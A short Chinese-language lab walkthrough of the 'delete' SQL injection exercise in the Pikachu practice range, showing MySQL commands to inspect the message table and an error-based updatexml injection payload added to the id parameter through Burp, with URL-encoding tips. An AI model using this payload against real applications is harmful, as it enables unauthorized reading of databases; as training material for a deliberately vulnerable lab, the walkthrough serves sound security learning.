Pikachu靶场 “delete”SQL注入

打开 Pikachu靶场 delete注入

随便写一个留言“hello”

在 MySQL 的 bin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码

mysql -u root -p
use pikachu
show tables;
select * from message;

回到 burp

在 id= 后面加

+or+updatexml(2,concat(0x7e,(select+database()),0x7e),0)

注 :

1. 这是个 数字型注入,所以 不要加引号

2. 因为是 get请求 ,所以 不能有空格

or updatexml(2,concat(0x7e,(select database()),0x7e),0)

要选中代码,右键,点击 Convert selection -> URL -> 选第二个(URL -encode key characters),就能变成上面的那样

你可能感兴趣的:(sql,数据库)